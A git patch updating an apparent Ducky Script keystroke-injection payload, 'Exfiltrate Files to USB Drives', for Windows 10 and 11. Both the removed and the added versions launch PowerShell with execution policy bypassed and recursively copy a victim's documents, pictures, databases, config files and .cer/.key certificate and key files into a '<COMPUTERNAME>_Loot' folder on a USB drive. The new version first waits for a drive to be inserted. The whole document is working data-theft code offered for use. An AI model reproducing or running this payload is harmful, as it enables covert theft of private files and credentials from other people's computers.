From f6e38212ec3b7133af20ba1e367549808066015c Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Mon, 18 Dec 2023 22:58:25 +0000 Subject: [PATCH] Update Exfiltrate Files to USB Drives.txt --- OSINT/Exfiltrate Files to USB Drives.txt | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/OSINT/Exfiltrate Files to USB Drives.txt b/OSINT/Exfiltrate Files to USB Drives.txt index b0b631f..edd11bb 100644 --- a/OSINT/Exfiltrate Files to USB Drives.txt +++ b/OSINT/Exfiltrate Files to USB Drives.txt @@ -1,8 +1,11 @@ -REM Title: Exfiltrate files to Removable Drives +REM Title: Exfiltrate files to Removable Drive REM Author: @beigeworm -REM Description: This Script finds all USB drives and attempts to copy many user files to them. (searches user folders for pictures, video, text files etc..) +REM Description: Waits for a new USB Storage device to be connected and then copies many user files to that USB drive REM Target: Windows 10 and 11 +REM 1. Run this script. +REM 2. Connect your USB drive + REM some setup for dukie script DEFAULT_DELAY 100 @@ -11,5 +14,5 @@ DELAY 750 STRING powershell -NoP -Exec Bypass ENTER DELAY 4000 -STRING $removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 };if($removableDrives.Length -eq 0){Write-Host "No Removable Drives Found.. Exiting";break}foreach($drive in $removableDrives){$driveLetter = $drive.DeviceID;Write-Host "Loot Drive Set To : $driveLetter/";$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft");$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos");$destinationPath = "$driveLetter\$env:COMPUTERNAME`_Loot";if(-not(Test-Path -Path $destinationPath)){New-Item -ItemType Directory -Path $destinationPath -Force;Write-Host "New Folder Created : $destinationPath"}foreach($folder in $foldersToSearch){Write-Host "Searching in $folder";foreach($extension in $fileExtensions){$files = Get-ChildItem -Path $folder -Recurse -Filter $extension -File;foreach($file in $files){$destinationFile = Join-Path -Path $destinationPath -ChildPath $file.Name;Write-Host "Copying $($file.FullName) to $($destinationFile)";Copy-Item -Path $file.FullName -Destination $destinationFile -Force}}}Write-Host "File Exfiltration complete."};exit -ENTER \ No newline at end of file +STRING $removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 };$count = $removableDrives.count;Write-Host "Connect a USB Drive.";While ($count -eq $removableDrives.count){$removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 };sleep 1};$drive = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 } | Sort-Object -Descending | Select-Object -First 1;$driveLetter = $drive.DeviceID;Write-Host "Loot Drive Set To : $driveLetter/";$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft");$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos");$destinationPath = "$driveLetter\$env:COMPUTERNAME`_Loot";if (-not(Test-Path -Path $destinationPath)) {New-Item -ItemType Directory -Path $destinationPath -Force;Write-Host "New Folder Created : $destinationPath"}foreach ($folder in $foldersToSearch) {Write-Host "Searching in $folder";foreach ($extension in $fileExtensions) {$files = Get-ChildItem -Path $folder -Recurse -Filter $extension -File;foreach ($file in $files) {$destinationFile = Join-Path -Path $destinationPath -ChildPath $file.Name;Write-Host "Copying $($file.FullName) to $($destinationFile)";Copy-Item -Path $file.FullName -Destination $destinationFile -Force}}}Write-Host "File Exfiltration complete.";exit +ENTER